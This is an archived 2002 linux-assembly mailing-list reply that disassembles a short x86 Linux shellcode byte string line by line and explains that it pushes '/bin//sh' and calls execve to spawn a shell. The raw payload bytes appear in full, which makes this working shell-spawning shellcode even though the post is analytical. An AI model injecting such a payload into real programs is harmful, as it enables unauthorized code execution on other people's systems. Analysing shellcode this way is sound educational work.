Re: shellcode - Stephan Walter

All of lore.kernel.org
 help / color / mirror / Atom feed

From: Stephan Walter <stephan.walter@gmx.ch>
To: linux-assembly@vger.kernel.org
Subject: Re: shellcode
Date: Tue, 25 Jun 2002 21:22:14 +0200	[thread overview]
Message-ID: <20020625212214.4910d000.stephan.walter@gmx.ch> (raw)
In-Reply-To: <20020624001839.H342@nietzsche>

This is my 5-minute analyzing:

$ echo -n \
$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\
x50\x54\x53\xb0\x3b\x50\xcd\x80' >> shell.asm

$ ndisasm -u shell.asm

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f   ; "//sh"
00000008  682F62696E        push dword 0x6e69622f   ; "/bin" 
						    ; -> execute /bin/sh
0000000D  89E3              mov ebx,esp   ; ebx points to the string
0000000F  50                push eax      
00000010  53                push ebx
00000011  50                push eax
00000012  54                push esp
00000013  53                push ebx
00000014  B03B              mov al,0x3b   ; 0x3b = SYS_execve
00000016  50                push eax
00000017  CD80              int 0x80      ; system call "execve"
					  ; -> execute the shell


Regards,
Stephan

next prev parent reply	other threads:[~2002-06-25 19:22 UTC|newest]

Thread overview: 6+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2002-06-24  5:18 shellcode xlp
2002-06-24  6:01 ` shellcode Scott Lanning
2002-06-25 19:22 ` Stephan Walter [this message]
     [not found]   ` <20020625144651.A430@nietzsche>
2002-06-25 20:28     ` shellcode Stephan Walter
     [not found]       ` <20020625161401.B27404@nietzsche>
2002-06-26 17:08         ` shellcode Stephan Walter
2002-06-26 18:00           ` shellcode Brian Raiter

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20020625212214.4910d000.stephan.walter@gmx.ch \
    --to=stephan.walter@gmx.ch \
    --cc=linux-assembly@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.